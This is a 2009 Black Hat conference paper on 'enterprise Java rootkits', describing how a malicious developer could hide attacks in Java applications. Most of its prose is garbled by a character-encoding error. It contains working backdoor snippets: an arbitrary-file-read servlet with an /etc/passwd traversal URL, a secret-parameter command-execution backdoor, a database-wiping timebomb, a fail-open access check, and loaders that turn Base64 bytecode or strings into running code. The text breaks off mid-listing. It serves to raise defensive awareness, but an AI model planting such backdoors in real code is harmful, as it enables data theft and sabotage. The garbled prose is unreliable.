BHUSA09 Williams Enterprise Java Root Kits PAPER

LnLerprlse !
ava 8ooLklLs

AspecL SecurlLv | www.aspecLsecurlLv.com
1 1
Enteipiise Iava Rootkits
"Baiuly anyone watches the uevelopeis"

!eff Wllllams, AspecL SecurlLv
[eff.wllllamsaspecLsecurlLv.com
1wlLLer planeLlevel
8lackPaL uSA, !ulv 29, 2009
Abstract
ln a world wlLh lavoffs, ouLsourclna, and oraanlzed crlme, Lhe rlsk from mallclous developers should be
consldered serlouslv. ln 8vLe Wars: 1he lmpacL of SepLember 11 on lnformaLlon 1echnoloav," Ld
?ourdon cauLlons us Lo remember LhaL hardlv anvone waLches Lhe proarammers" [1].
Pow much would lL cosL Lo convlnce a developer Lo lnserL a few speclal llnes of !ava ln vour appllcaLlon?
Would vou deLecL Lhe aLLack before lL wenL llve? Pow much damaae could lL do? ln manv wavs
mallclous developers are Lhe ulLlmaLe lnslders. WlLh a verv small number of llnes of !ava, Lhev can sLeal
all vour daLa, corrupL svsLems, lnsLall svsLem level aLLacks, and cover Lhelr Lracks. WhaL's reallv scarv ls
LhaL a Lro[aned SLruLs or Loa4[ llbrarv could affecL mosL of Lhe flnanclal lndusLrv all aL once.
ln Lhls paper, we examlne Lhe Lechnlques LhaL mallclous proarammers can use Lo lnserL and hlde Lhese
aLLacks ln an enLerprlse !ava appllcaLlon. We examlne Lechnlques for booLsLrapplna exLernal aLLacks,
avoldlna code revlew, avoldlna sLaLlc analvsls, Lro[anlna llbrarles, and Lro[anlna an enLerprlse bulld
server. 1he polnL here ls noL Lo show how complex Lhese aLLacks are, buL raLher how manv
opporLunlLles Lhere are and how slmple and obvlous Lhev are Lo mosL developers.
1he paper also presenLs several sLraLeales for mlnlmlzlna Lhe rlsk Lo oraanlzaLlons from mallclous !ava
developers. We evaluaLe Lhe beneflLs and llmlLaLlons of procedural conLrols, Lechnlcal conLrols, and
deLecLlon. ln parLlcular we focus on Lechnlques for llmlLlna Lhe LrusL vou aranL developers Lhrouah
resLrlcLlna Als, esLabllshlna a LrusLworLhv bulld process, and llmlLlna LrusL ln operaLlon wlLh Lhe !ava
SecurlLvManaaer. We'll also dlscuss lmprovlna deLecLlon Lechnlques such as code revlew and sLaLlc
analvsls Lools.
8uslnesses should be aware of Lhese rlsks so LhaL Lhev can make lnformed declslons abouL Lhelr
sofLware supplv chaln, and even wheLher Lo auLomaLe cerLaln buslness funcLlons aL all.

LnLerprlse !ava 8ooLklLs

2 2
1. Introduction
MosL enLerprlses have almosL compleLelv lanored Lhe rlsk of mallclous developers. 1he uncerLalnLv and
Lechnlcal complexlLv of Lhe lssue comblned wlLh Lhe advanLaaes of movlna buslnesses onllne ofLen
makes lL dlfflculL Lo reason abouL. ln Lhls secLlon we dlscuss some of Lhe rlsk facLors LhaL enLerprlses
should conslder ln Lhls area.
Tb Risk of Malicious Dvloprs
Pow can we deLermlne Lhe rlsk assoclaLed wlLh a reneaade sofLware developer? 1o approach Lhe
quesLlon we have Lo break down Lhe llkellhood and lmpacL and compare Lo oLher rlsks faclna our
enLerprlse.
unforLunaLelv, Lhere ls a sLunnlna lack of lnformaLlon abouL Lhls rlsk. All we can do ls make con[ecLures
abouL how easv Lhese aLLacks are, how unllkelv Lhev are Lo be deLecLed, and how bla Lhe pavoff mlahL
be. MosL sofLware developers wouldn'L even conslder performlna an aLLack llke Lhls. Powever, Lhere ls
aood evldence LhaL oraanlzed crlme ls becomlna lncreaslnalv sophlsLlcaLed abouL cvbercrlme and lL ls
hard Lo belleve Lhev would lanore Lhls opporLunlLv. ALLacks llke Lhls have been popularlzed ln movles
such as War Cames and Cfflce Space, so lL's falrlv cerLaln Lhev could come up wlLh Lhe ldea.
1here have been Lwo ma[or sLudles LhaL conslder Lhe rlsk relaLed Lo sofLware developed overseas. 8oLh
of Lhem equlvocaLe abouL Lhls rlsk. Cne araues LhaL lmprovemenLs ln cvber securlLv and sofLware
assurance wlll mlLlaaLe Lhe rlsk of mallclous code lnserLlons" [2]. 1he oLher sLaLes LhaL a crafLv,
deLermlned lnslder wlll be able Lo lnserL mallclous hldden sofLware code -- even wlLh prevenLlve
measures ln place" [3].
Are Lhere anv developers ln vour oraanlzaLlon LhaL would be LempLed bv a larae pavoff? WhaL lf
someone offered Lhem cash Lo lnserL mallclous code lnLo an enLerprlse. Anv emplovee who aeLs lnLo
flnanclal Lrouble ls more llkelv Lo succumb Lo such an lncenLlve.
1o help undersLand Lhe problem, Lhls paper conslders Lhe dlfflculLv of creaLlna a successful explolL LhaL
ls unllkelv Lo be deLecLed ln a Lvplcal enLerprlse. 1he obvlous concluslon ls LhaL lL would be qulLe easv for
a developer wlLh even moderaLe skllls Lo enalneer one of Lhese aLLacks, even wlLh falrlv sophlsLlcaLed
securlLv processes ln place.
ln Lhls paper, we explore Lhe Lvpes of aLLack LhaL a mallclous developer mlahL be able Lo perform. 1he
concluslon ls LhaL a successful aLLack could easllv reach all Lhe daLa and funcLlonallLv avallable Lo Lhe
LaraeLed appllcaLlon, and mlahL be able Lo reach oLher appllcaLlons and lnfrasLrucLure.
1herefore, on boLh counLs, we are forced Lo conclude LhaL when looklna aL an enLlre enLerprlse,
mallclous developers are boLh llkelv and verv danaerous. Whv Lhen do mosL oraanlzaLlons follow Lhe
we LrusL our developers" model and do vlrLuallv noLhlna Lo proLecL aaalnsL Lhls rlsk?

3 3
Too Dangrous to Discuss?
1he lnlLlal reacLlon from some revlewers ls LhaL Lhls paper mav ao Loo far ln maklna Lechnlques for
mallclous code avallable Lo hackers. Whlle a lealLlmaLe concern, Lhere are a few reasons LhaL Lhls Loplc ls
crlLlcallv lmporLanL Lo sLarL explorlna and undersLand.
llrsL of all, none of Lhe Lechnlques dlscussed ln Lhls paper are novel or even compllcaLed. Cnlv a few of
Lhe speclflc examples haven'L been publlshed anvwhere before, and LhaL's because Lhev are compleLelv
obvlous. 1he whole polnL of Lhls paper ls Lo demonsLraLe Lhe huae varleLv of slmple wavs LhaL a
developer could compleLelv undermlne Lhe securlLv of an oraanlzaLlon's appllcaLlon lnfrasLrucLure.
Second, lL ls unforLunaLelv clear LhaL mosL oraanlzaLlons are noL lnLeresLed ln crlLlcallv evaluaLlna Lhe
rlsk posed bv mallclous developers wlLhouL concreLe examples. 1heoreLlcal dlscusslons on Lhe Loplc have
been and wlll llkelv Lo conLlnue Lo be roundlv lanored. Also, [usL as we learn an lncredlble amounL from
acLuallv lmplemenLlna proper securlLv conLrols [4], we slmllarlv learn a areaL deal bv acLuallv Lrvlna Lo
lmplemenL Lhese aLLacks.
llnallv, we need more research Lo learn abouL mallclous proarammers and undersLand Lhls rlsk. Cn Lhe
one hand, new sofLware Lechnoloales are crlLlcallv lmporLanL Lo lmprove producLlvlLv and our sLandard
of llvlna. Cn Lhe oLher hand, Lhls same lmporLance drlves Lhe rlsk conLlnuouslv upward. We need Lhls
research Lo beLLer undersLand Lhe llkellhood and lmpacL of Lhese aLLacks. We also need new Lechnlques
for deLecLlna, deLerrlna, and prevenLlna Lhese aLLacks.
8v lanorlna Lhe rlsks assoclaLed wlLh sofLware-enabllna a buslness, Lhe calculus ls slmple - aolna onllne
alwavs wlns. We have alreadv experlenced one ma[or melLdown ln Lhe flnanclal markeLs based laraelv
on lanorlna unllkelv buL serlous rlsks. uLLlna crlLlcal appllcaLlons onllne wlLhouL conslderlna Lhe
mallclous developer rlsk seems llke someLhlna we need Lo dlscuss.
Wbo Is tb Malicious Dvlopr?
Anv developer LhaL wrlLes code for vour enLerprlse appllcaLlons could cause vou serlous harm. 1hls
lncludes vour lnLernal developers as well as ouLsourced, open source, and commerclal developers. ?ou
mlahL lnclude developers of servlces LhaL vou use, dependlna on how much vou LrusL Lhem.
Whv would a developer wrlLe mallclous code? 1hev mav have a arudae aaalnsL Lhe companv, Lhev mav
have a pollLlcal or soclal aaenda, or Lhev mav be funded bv oraanlzed crlme. Pow much monev would lL
Lake Lo aeL a developer Lo lnLroduce mallclous code lnLo Lhelr enLerprlse? AlLhouah Lhere have noL been
anv formal sLudles, lL ls safe Lo sav LhaL manv would be LempLed bv less Lhan $10,000 uS.
And whaL would Lhe reLurn be? ln mosL cases, Lhere are almosL no llmlLs on Lhe damaae a mallclous
sofLware developer could do. ln mosL enLerprlses, Lhere ls an lmpllclL assumpLlon LhaL Lhe developers
and Lhe appllcaLlons Lhev produce are LrusLed." 1herefore, Lhev are ofLen hosLed ln a daLacenLer
wlLhouL separaLlon from oLher appllcaLlons, daLabases, and malnframes.

4 4
Whlle Lhere mav be access conLrol ln place for users, Lhere ls Lvplcallv no resLrlcLlon on whaL developers
mav access. ln Lhls envlronmenL, Lhe mallclous developer has Lhe opporLunlLv Lo copv, corrupL, or deleLe
all of Lhe oraanlzaLlon's daLa wlLhouL a Lrace. ln addlLlon, Lhev could conLrol or denv servlce Lo crlLlcal
buslness funcLlons. uependlna on Lhe oraanlzaLlon, Lhev could use Lhls access Lo sLeal monev, download
people's personal lnformaLlon Lo sell lL, perform sLock LransacLlons, planL backdoors for laLer, or creaLe a
Llmebomb.
Simpl Malicious Entrpris Cod Exampls
Manv enLerprlses have hundreds or Lhousands of appllcaLlons LoLallna mllllons of llnes of code. Manv
aLLacks can be performed ln onlv a few llnes of code. lor example, conslder Lhe amounL of servleL code
requlred Lo sLeal anv flle off Lhe flle svsLem of Lhe appllcaLlon hosL.
protected void doGet(HttpServletRequest req, HttpServletResponse resp) {
String x = req.getParameter( "x" );
BufferedReader r = new BufferedReader( new FileReader( x ) );
while ( ( x = r.readLine() ) != null ) resp.getWriter().println( x );
}

Lven Lrlvlal obfuscaLlon makes Lhls aLLack unllkelv Lo be noLlced ln Lhe Lvplcal developmenL process. 1he
aLLacker below has made lL seem LhaL Lhe polnL of Lhe code ls Lo seL a CSS color from Lhe user's
preference. Powever, lL uses a lealLlmaLe looklna valldaLe() meLhod whlch ls reallv mallclous. 1he
valldaLe() meLhod LesLs lf Lhe color ls a valld flle, and lf so reLurns Lhe full conLenL of Lhe flle Lo expose ln
Lhe P1ML ouLpuL.
// setup default background color, using default if necessary
String color = request.getParameter( "color" );
out.println( "style=\"color: " + validate( color, DEFAULT_COLOR ) + "\"" );

http://www.example.com?color=../../../../../etc/passwd

1o show some of Lhe posslble lmpacLs of mallclous code ln a !ava enLerprlse envlronmenL, below are
some slmple examples of mallclous !ava code. verv llLLle aLLempL has been made Lo obfuscaLe Lhese
aLLacks. 1hese examples could be made lnLo rooLklLs lf Lhev were dlsaulsed wlLh Lhe Lechnlques
descrlbed laLer ln Lhls paper.
Cver 10 vears aao, Lhe auLhor uncovered a slmple LasLer eaa" ln an lnLerneL-faclna buslness web
appllcaLlon for a ma[or u.S. corporaLlon. ln LhaL appllcaLlon, lf vou Lvped Lhe developer's name lnLo Lhe
zlp code fleld, vou aeL a speclal paae dedlcaLed Lo how much of a aenlus Lhe developer ls. Whlle Lhe
aLLack ln LhaL example was noL aL all damaalna, lL shows [usL how easv Lhese aLLacks are. lor example,
Lhe developer could have made Lhe aLLack much more danaerous bv lnvoklna Lhe command shell, as
shown below.

3 3
if ( request.getParameter( "backdoor" ).equals( "C4A938B6FE01E" ) ) {
Runtime.getRuntime().exec( req.getParameter( "cmd" ) );
}

lf a mallclous developer wanLs Lo leave a lasLlna lmpresslon aL a corporaLlon, Lhev can creaLe a
Llmebomb. ln Lhe example below, Lhe aLLack ls launched anvLlme Lhe appllcaLlon ls run afLer SepLember
11, 2009. 1he aLLack conslsLs of sLarLlna a Lhread LhaL deleLes random records from a daLabase Lable on
a random schedule. 1hls Lvpe of daLa desLrucLlon or modlflcaLlon ls dlfflculL Lo reconsLrucL because lL can
happen over a lona perlod of Llme.
if ( System.currentTimeMillis() > 1252641600000 ) // Sept. 11, 2009
new Thread( new Runnable() { public void run() {
Random sr = new SecureRandom();
while( true ) {
String query = "DELETE " + sr.nextInt() + " FROM data";
try {
c.createStatement().executeQuery( query );
Thread.sleep( sr.nextInt() );
} catch (Exception e) {}
}
}}).start();

erhaps Lhe mosL dlfflculL Lo flnd aLLacks are Lhe ones LhaL requlre an undersLandlna of Lhe buslness
loalc ln order Lo ldenLlfv. lmaalne a slmple buslness rule llke onlv one coupon allowed aL a Llme." 1he
developer lmplemenLlna Lhls code could allow an aLLacker Lo redeem mulLlple coupons on LransacLlons
for more Lhan $100. 1hls lmplemenLaLlon looks reasonable Lo Lhe Lvplcal securlLv code revlewer, buL ls
noL whaL was lnLended bv Lhe buslness and could cosL Lhem slanlflcanLlv. CLher buslness rule lssues can
be slanlflcanLlv more damaalna.
A developer can do plenLv of damaae wlLhouL leavlna Lhe !ava envlronmenL. 1hev can affecL buslness
rules, corrupL daLa, or dlsclose daLa. CerLalnlv Lhouah, Lhe damaae can be far worse lf Lhe explolL leaves
Lhe !ava envlronmenL and accesses Lhe operaLlna svsLem dlrecLlv. WlLh such access, Lhe developer can
cerLalnlv do anvLhlna Lhe appllcaLlon can do, and poLenLlallv qulLe a blL more.
1hese are [usL a few of Lhe damaalna Lhlnas LhaL a mallclous developer mlahL lnLroduce lnLo an
enLerprlse web appllcaLlon. 1he lack of consLralnLs on Lhe vasL ma[orlLv of code LhaL runs ln Lhe
enLerprlse affords a sLaaaerlna opporLunlLv for mlscreanLs. 1o make maLLers worse, Lvplcal enLerprlse
!ava envlronmenLs have manv powerful llbrarles avallable Lo make Lhls klnd of aLLack easv Lo perform
and easv Lo obscure.

6 6
About )ava Entrpris Rootkits
Accordlna Lo Wlklpedla, A rooLklL ls a sofLware svsLem LhaL conslsLs of a proaram or comblnaLlon of
several proarams deslaned Lo hlde or obscure Lhe facL LhaL a svsLem has been compromlsed." So a
rooLklL lsn'L Lhe acLual explolL, lL's Lhe code LhaL hldes Lhe explolL.
We're uslna Lhe Lerm !ava LnLerprlse 8ooLklL" Lo descrlbe mallclous code ln an enLerprlse !ava
appllcaLlon LhaL uses Lechnlques Lo hlde from boLh manual code revlew and sLaLlc analvsls, obfuscaLe
daLa exfllLraLlon, and avold deLecLlon ln loas or oLher lnLruslon deLecLlon mechanlsms.
Mallclous code ls noL Lhe same as a vulnerablllLv. MosL lnadverLenL vulnerablllLles are lnLroduced bv
proarammers who wasn'L Lralned ln secure codlna or dldn'L have Lhe rlahL enLerprlse securlLv Al
avallable [4]. Mallclous code, on Lhe oLher hand, ls saboLaae - lL [usL causes harm dlrecLlv. Mallclous
code lnLenLlonallv avolds securlLv conLrols. 8ooLklL Lechnlques make Lhls mallclous code verv dlfflculL Lo
flnd ln an appllcaLlon.
ln Lhls paper, we wlll assume a mallclous developer wlLh onlv normal ablllLv Lo chanae code ln Lhe
sofLware basellne of a !ava LL appllcaLlon. We'll also assume a Lvplcal enLerprlse !ava envlronmenL -
one LhaL runs wlLhouL a SecurlLvManaaer [3,6,7,8] - alLhouah manv of Lhe examples would noL be
affecLed bv a sandbox.
Lven assumlna a rooLklL could evade deLecLlon bv boLh Lools and humans, some aLLacks requlre aeLLlna
daLa ouL of Lhe enLerprlse. Avoldlna deLecLlon of daLa leavlna Lhe neLwork ls a challenae for rooLklL
developers, who can hlde daLa ln oLher proLocols, use sLeaanoaraphv, Llmlna channels, and manv oLher
Lechnlques. Whlle Lhls ls an lmporLanL Loplc for mallclous developers, lL has been well covered
elsewhere.
ln Lhe followlna secLlons, we conslder how a mallclous developer can hlde a rooLklL from boLh human
and auLomaLed revlews, and how such an aLLack mlahL be dellvered. 1he secLlons ln Lhls paper are noL
lnLended Lo be lronclad caLeaorles of Lechnlques, as a successful aLLack wlll llkelv comblne a number of
dlfferenL Lechnlques.
Plausibl Dniability
A prlmarv aoal for mallclous developers ls Lo avold deLecLlon. 8uL lf Lhelr rooLklL ls deLecLed, Lhev wanL a
plauslble case LhaL Lhe code was an lnnocenL mlsLake and noL a mallclous aLLack.
1hls means LhaL Lhe besL aLLacks are Lhe ones LhaL look [usL llke Lhe Lvplcal vulnerablllLles we flnd ln code
all Lhe Llme. AuLhenLlcaLlon problems, access conLrol problems, command ln[ecLlon, SCL ln[ecLlon, eLc.
ln facL, manv Llmes, Lhe blaaesL securlLv holes are noL ln Lhe code aL all. 1hev are flaws due Lo Lhe lack of
a securlLv conLrol where Lhere should be one.

7 7
ln Lhe example below, Lhe SLruLs acLlon does noL check LhaL Lhe requesLed accLld ls assoclaLed wlLh Lhe
user maklna Lhe requesL, allowlna an aLLacker Lo forae a requesL and updaLe someone else's accounL.
SomeLlmes Lhe doas LhaL don'L bark are Lhe hardesL Lhlna Lo noLlce [9].
public class UpdateAccountSubmit extends Action {

public ActionForward execute(ActionMapping mapping,ActionForm
form,HttpServletRequest request,HttpServletResponse response) throws IOException,
ServletException {
DynaActionForm accountForm = (DynaActionForm)form;
String acctid=(String)searchForm.get("acctid");
User user = getUserService().load(acctid);
if (user == null) {
ActionErrors errors = new ActionErrors();
errors.add(ActionErrors.GLOBAL_ERROR,new ActionError("message.notfound"));
saveErrors(request, errors);
return mapping.findForward("failure") ;
}
user.update(request);
request.setAttribute("user", user);
return mapping.findForward("success");
}
}

A mallclous developer also mlahL lnLroduce a subLle flaw LhaL code analvsls mlahL mlss. ln Lhls case, Lhe
revlewer would have Lo recoanlze LhaL Lhe followlna code has someLhlna Lo do wlLh access conLrol and
LhaL lL could fall open. lf Lhe user falls Lo provlde a resource" parameLer, Lhe code wlll Lhrow a
nullolnLerLxcepLlon and fall Lhrouah Lo Lhe buslness funcLlon.
Resource resource = lookup( request.getParameter( "resource" ) );
try {
if ( !request.isUserInRole(resource.getRequiredRole()) {
logger.warn( "Unauthorized request for resource" );
return;
}
} catch( Exception e ) {}
...
// continue with business function

A aood sLraLeav for esLabllshlna plauslble denlablllLv ls Lo creaLe overpowerful funcLlons LhaL have a
lealLlmaLe use. lor example, lf Lhe code requlres readlna ln a flle, whv noL make a readllle() funcLlon
LhaL ls avallable Lo evervone? lf vou have Lo load plualns, whv noL creaLe a cusLom classloader LhaL
converLs bvLes lnLo code. Cnce Lhese overpowerful funcLlons are avallable, Lhe amounL of code requlred
for a rooLklL becomes exLremelv small.
AnoLher Lechnlque ls Lo avold accounLablllLv for Lhe mallclous code. 1here are manv wavs Lo aeL
mallclous code onLo Lhe classpaLh of an appllcaLlon. lf Lhe rooLklL can be added Lo a llbrarv LhaL ls
auLomaLlcallv lncluded ln Lhe appllcaLlon, or ln parL of Lhe plaLform, Lhe accounLablllLv for Lhe code mav

8 8
be losL. WhaL lf developers can puL code lnLo oLher developer's envlronmenLs? Cr accounLablllLv ls noL
well enforced ln Lhe source code conLrol svsLem?
lf Lhe aLLack ls loaded aL runLlme, manv people Lhlnk LhaL aLLacks wlll be capLured ln appllcaLlon loas.
1here are Lwo ma[or problems wlLh Lhls assumpLlon. llrsL, Lhe sLaLe of appllcaLlon loaalna for securlLv ls
aenerallv verv weak. Manv appllcaLlons don'L even loa securlLv fallures llke bad lnpuL, falled access
conLrol checks, or aLLempLs Lo bvpass auLhenLlcaLlon. Second, even lf LhaL loaalna were ln place,
mallclous code would speclflcallv avold Lhe loas. 1here would be no record of Lhe mallclous acLlvlLv
anvwhere.
2. Turning Data into Cod
1he slmplesL Lvpe of mallclous code dlrecLlv performs an aLLack. 8uL Lhere ls a more sophlsLlcaLed Lvpe
of mallclous code LhaL booLsLraps an aLLack LhaL ls loaded from an exLernal source. ln Lhls secLlon we
dlscuss Lechnlques for loadlna and execuLlna arblLrarv code lnLo Lhe !ava vM.
1he aLLacker can hlde Lhe daLa wlLhln Lhe appllcaLlon, or can send Lhe daLa ln from Lhe ouLslde. WlLhln
Lhe appllcaLlon, daLa can be sLored ln a sLrlna, a bvLe arrav, Lhe flle svsLem, a daLabase, or a mllllon oLher
places. LnLerprlse !ava appllcaLlons also accepL daLa from web users, web servlces, aaLewavs, parLners,
malnframes, and more. LlLher wav, Lhe aLLacker needs Lo converL LhaL daLa lnLo a mallclous pavload and
execuLe lL.
1here are manv wavs for a mallclous developer Lo deslan a Lrlaaer or daLa lnpuL LhaL would be vlrLuallv
lmposslble Lo deLecL. SLranae header values, arblLrarv header names, paLLerns ln parameLer values, eLc.
Lven case senslLlvlLv or spaces beLween characLers can be used. 1lmlna channels can be used Lo sLream
daLa lnLo an appllcaLlon over Llme as well. lor example, Lhe number of seconds beLween requesLs mlahL
represenL Lhe nexL bvLe ln a mallclous pavload belna assembled.
Cnce Lhe aLLack has been senL lnLo Lhe appllcaLlon, Lechnlques Lo Lurn LhaL daLa lnLo code are kev
componenLs ln manv dlfferenL forms of rooLklLs. 1hev help Lo frusLraLe analvsls bv boLh human code
revlewers and auLomaLed Lools.
Abusing tb )ava Compilr API
Cne obvlous wav ls Lo use Lhe !ava compller Al Lo complle an aLLack class. 1hls Al ls onlv avallable ln
Lhe !uk, noL Lhe !8L. Powever, mosL enLerprlse !ava LL producLlon envlronmenLs do run on Lhe !uk,
because Lhev need Lo be able Lo complle !S flles. Cne of Lhe cardlnal rules of hardenlna ls Lo make sure
LhaL compllers are noL avallable Lo aLLackers, veL an exLremelv powerful compller Al ls avallable ln mosL
producLlon !ava appllcaLlons. recomplllna !Ss wlLh [spc and runnlna on a !8L can help Lo avold Lhls
problem.

9 9
ln Lhe example below, Lhe !ava compller Al ls lnvoked Lo complle a sLrlna conLalnlna a verv shorL
proaram. 1he proaram searches Lhe classpaLh for Lhe flrsL avallable dlrecLorv ln whlch Lo wrlLe class flles.
Classes could be wrlLLen Lo [ar flles as well, buL lL would requlre a few more llnes of code. Cnce Lhe class
ls complled and puL on Lhe classpaLh, Lhe class ls loaded bv execuLlna a Class.forname() call. 1he pavload
ls ln a sLaLlc lnlLlallzer so LhaL lL wlll run as soon as Lhe class ls loaded.
import java.io.File;
import java.net.URI;
import java.util.*;
import javax.tools.*;

public class Compiler {

private static String code =
"public class NotepadLauncher{" +
"static {" +
"try { Runtime.getRuntime().exec(\"notepad.exe\"); }" +
"catch( Exception e ) {}}}";

public static void main( String[] args ) throws Exception {
JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
String out = ".";
String cp = System.getProperty("java.class.path");
List<String> entries = Arrays.asList(cp.split(";"));
for ( String entry : entries ) {
File f = new File( entry );
if ( f.isDirectory() ) { out = entry; break; }
}
List<String> opt = Arrays.asList("-d",out);
SourceFile sf = new SourceFile( "NotepadLauncher.java", code );
compiler.getTask( null, null, null, opt, null, Arrays.asList( sf ) ).call();
Class.forName( "NotepadLauncher" );
}
}

class SourceFile extends SimpleJavaFileObject {
String code = null;
SourceFile( String filename, String sourcecode ) {
super( URI.create("string:///" + filename), Kind.SOURCE);
code = sourcecode;
}
public CharSequence getCharContent(boolean ignoreEncodingErrors) {
return code;
}
}
Abusing tb )SP Compilr
lL ls also posslble Lo use Lhe !S compller Lo do Lhe same Lhlna. 1he aLLacker can elLher lnvoke Lhe !S
compller proarammaLlcallv, or Lhev can slmplv wrlLe a flle anvwhere ln Lhe webapp dlrecLorv (excepL
wlLhln WL8-lnl). 1he aLLacker can Lhen access Lhe !S wlLh a normal web requesL from Lhe ouLslde, or
could forward a requesL Lo Lhe mallclous !S. 1he flle can be deleLed afLer Lhe aLLack Lo remove Lhe
evldence. 1he sLrlna conLalnlna Lhe exec() call could be passed ln as a parameLer or hldden elsewhere.

10 10
File f = new File( "file.jsp" );
FileWriter fw = new FileWriter(f);
fw.writeln( "<html><body><%Runtime.getRuntime().exec("calc")%></body></html>"
request.getRequestDispatcher("file.jsp").forward(request,response);
f.delete();
Abusing tb ClassLoadr
An aLLacker can also use a cusLom classloader Lo Lurn bvLes lnLo execuLable code. 1he prlvaLe flnal naLlve
deflneClass() meLhod ln Lhe !ava classloader ls whaL acLuallv Lurns an arrav of bvLes[] lnLo an execuLable
Class. Lven Lhouah Lhls meLhod ls noL dlrecLlv accesslble because lL ls prlvaLe and flnal, deflneClass() can
be exposed bv exLendlna ClassLoader and addlna a meLhod LhaL deleaaLes Lo deflneClass. 1hls can be
done ln a slnale llne of code, as shown below.
ln Lhe example, an anonvmous lnner ClassLoader ls creaLed LhaL exposes a meLhod named x" whlch
reLurns Lhe new Class. 1he ClassLoader.x() meLhod ls lnvoked wlLh an arrav of bvLes LhaL conLalns Lhe
bvLecode of a mallclous !ava class flle. 1hls creaLes Lhe Class, whlch ls noL lnlLlallzed unLll Lhe
newlnsLance() call ls lnvoked. 1he aLLack ls ln Lhe sLaLlc lnlLlallzer of Lhe newlv creaLed class, where Lhe
aLLacker sLored Lhe mallclous code.
new ClassLoader() { Class x( byte[] b ) {
return defineClass( null, b, 0, b.length ); } }.x( b ).newInstance();

AlLhouah Lhe use of ClassLoaders can be conLrolled wlLh Lhe !ava sandbox and lL ls someLhlna LhaL mlahL
sLand ouL Lo boLh auLomaLed Lools and a manual code revlewer, Lhev are frequenLlv noL conLrolled as
Lhev are needed for lealLlmaLe purposes such as supporLlna plualns and hoLflxes Lo appllcaLlons.
1o use Lhe mallclous classloader, Lhe aLLacker needs Lo aeL Lhe bvLes of a mallclous class flle lnLo Lhe
appllcaLlon so Lhev can be loaded and run. Cne easv wav Lo do Lhls ls Lo sLore Lhem ln a 8ase64 encoded
sLrlna and Lhen decode Lhem lnLo a bvLe arrav. llrsL we need a mallclous class flle such as Lhe one
below.
public class ExecStatic {
static {
try {
Runtime.getRuntime().exec("notepad");
}
}

1hen we need a Lool LhaL wlll wrlLe ouL Lhe bvLes of Lhls slmple class as a base64 encoded sLrlna. 1he
Lool below does [usL LhaL.

11 11
import java.io.*;

/* Program to write out bytes of malicious class file as Base64 string*/
public class Dumper {
public static void main(String[] args) throws Exception {
for ( int j = 0; j < args.length; j++ ) {
File f = new File( args[j] );
FileReader reader = new FileReader( f );
byte[] bytes = new byte[ (int)f.length() ];
for ( int i = 0; i < f.length(); i++ ) {
bytes[i] = (byte)reader.read();
}
String encoded = new sun.misc.BASE64Encoder().encode( bytes );
System.out.println( encoded.replace("\n","").replace("\r","") );
}
}
}

> java Dumper Attack.class
yv66vgAAADIAIAcAAgEABkF0dGFjawcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVg
EABENvZGUKAAkACwcACgEAEWphdmEvbGFuZy9SdW50aW1lDAAMAA0BAApnZXRSdW50aW1lAQAVKClMamF2
YS9sYW5nL1J1bnRpbWU7CAAPAQAHd29yZHBhZAoACQARDAASABMBAARleGVjAQAnKExqYXZhL2xhbmcvU3
RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7BwAVAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAD0xpbmVOdW1i
ZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEADVN0YWNrTWFwVGFibGUBAAY8aW5pdD4KAAMAGwwAGQ
AGAQAEdGhpcwEACExBdHRhY2s7AQAKU291cmNlRmlsZQEAC0F0dGFjay5qYXZhACEAAQADAAAAAAACAAgA
BQAGAAEABwAAAEsAAgABAAAADrgACBIOtgAQV6cABEuxAAEAAAAJAAwAFAADABYAAAAOAAMAAAAEAAwABQ
ANAAEAFwAAAAIAAAAYAAAABwACTAcAFAAAAQAZAAYAAQAHAAAALwABAAEAAAAFKrcAGrEAAAACABYAAAAG
AAEAAAABABcAAAAMAAEAAAAFABwAHQAAAAEAHgAAAAIAHw==

1o explolL Lhls approach, Lhe mallclous developer would puL Lhe followlna code somewhere ln Lhelr
servleL or ln a !S, and Lhen Lhev send a requesL conLalnlna Lhe 8ase64 encoded aLLack bvLecode. 1he
aLLack wlll aeL loaded and run bv Lhe classloader, and Lhe noLepad wlll be launched.
public void doGet(HttpServletRequest req, HttpServletResponse resp) {
byte[] b = new sun.misc.BASE64Decoder().decodeBuffer( request.getParameter("x") );
new ClassLoader() { Class x( byte[] b ) {
return defineClass( null, b, 0, b.length ); } }.x( b ).newInstance();
}

http://www.example.com/servlet?x=yv66vgAAADIAIA...

Abusing tb )ava Instrumntation API
!ava 3 added Lhe !ava lnsLrumenLaLlon Al, whlch allows a developer Lo provlde "!ava aaenLs" LhaL can
lnspecL and modlfv Lhe bvLe code of Lhe classes as Lhev are loaded. ln !ava 3, Lhls had Lo be speclfled on
Lhe command llne LhaL launched Lhe !ava vM. Powever, ln !ava 6 lL became posslble Lo add Lhese aaenLs
proarammaLlcallv as well as hoLpaLch" classes LhaL are alreadv loaded. 1hls affords Lhe mallclous
developer an opporLunlLv Lo modlfv almosL anv class, spv on Lhe runLlme, and execuLe arblLrarv code.

12 12
ln Lhe example below, Lhe aLLacker's code Lro[ans a class flle as above, aeneraLes a [ar flle conLalnlna an
aaenL," looks up Lhe process ld of Lhe currenL vM and aLLaches Lhe aaenL Lo lL. 1he aaenL arabs Lhe
Lro[aned replacemenL class and does a hoLpaLch" on Lhe runnlna vM. ln Lhls case, Lhe behavlor of Lhe
SLrlna.LoSLrlna() meLhod ls replaced wlLh one LhaL addlLlonallv launches Lhe Wlndows noLepad"
proaram.
import java.lang.management.ManagementFactory;
import java.util.Properties;
import com.sun.tools.attach.VirtualMachine;

public class Attacher {
public static void main( String[] args ) throws Exception {
// Test out the "before" behavior
System.out.println( new Innocent() );

// Build the the Agent jar
String jarpath = "C:/jars/SpecialAgent.jar";
Properties p = new Properties();
p.setProperty("Main-Class", "SpecialAgent");
p.setProperty("Manifest-Version", "1.0");
p.setProperty("Agent-Class", "SpecialAgent" );
p.setProperty("Can-Retransform-Classes", "true" );
p.setProperty( "Can-Redefine-Classes","true");
p.list( System.out );
File f = new File( "bin/SpecialAgent.class" );
JarWriter.writeJar( JarWriter.readFile(f), p, jarpath );

// Make a modified class file and set it where the Agent can find it
bytes = Bcel.trojan( "bin/Innocent.class", "toString" ).getBytes();

// Get the process id of this VM and attach the Agent
String pid = ManagementFactory.getRuntimeMXBean().getName().split("@")[0];
VirtualMachine vm = VirtualMachine.attach(pid);
